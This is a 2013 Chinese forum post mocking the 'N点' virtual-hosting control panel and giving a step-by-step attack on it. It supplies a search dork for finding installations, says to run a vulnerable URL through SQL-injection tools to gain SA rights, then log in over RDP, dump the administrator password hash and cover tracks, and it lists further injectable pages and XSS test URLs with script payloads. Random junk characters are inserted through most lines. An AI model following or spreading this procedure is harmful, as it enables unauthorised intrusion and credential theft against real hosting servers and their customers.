不得不说N点实在是一个破东西5 g$ D( K& u! S; e! p2 |2 G
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
$ w% S- v6 O# e好吧 抱怨一下就行了 接下来关键的时候到了
8 i$ N* O4 s' N% \* w7 U首先百度搜索关键字:inurl: (mmdatabase.asp)
2 u0 J7 R$ m1 M6 c. R我随便列举一个: www.xxxx.com# C9 g6 h7 {- E6 v. [* ] k+ C
修改链接:http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
9 i$ @2 r9 t& t0 y3 r9 K, K- H扔入NBSI 或者啊D等各种傻逼工具后
. T* s- B* u; E你们会看到是SA权限
( E! u# Q! O, N果断3389 上去 hash得到administrator密码( ]: \& j3 `: \
擦屁股走人~+ B/ m1 S5 a' e. `' o
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
% I8 ~" Q; d9 p0 s! @2 W: ^( w# F4 |
4 s6 }; E9 N' |7 }; @ T# f再附上其他几个漏洞页面
_. r8 v1 ?$ ~5 W0 tSQL:% \: v* W! i. g! B
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1) |, T" t5 w7 V0 F( a
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
3 ~- y: e) S9 I xhttp://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9* c) I5 g; f; W; C( T
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2. o% f" L, [( Z: y8 ?
XSS证明: e* [# k0 \ n( i n% Z6 s" N
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”3 L3 O9 I0 w/ ?2 M: W7 ?- q$ o
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp”;alert(42873);”
3 i) a) C3 R2 ]+ q2 ?) Whttp://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn<script>alert(42873)</script>6 h/ O. H, l; J/ {
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜- k p( y4 j% E0 Q$ `/ m0 }
还是星外吧 你们懂的% h* i5 ]0 ]# ^. B
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?$ c) R- l8 x+ f
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉' u- O6 s7 v$ [6 r
——- |
发表于 2013-3-3 08:06:44
收藏
支持
反对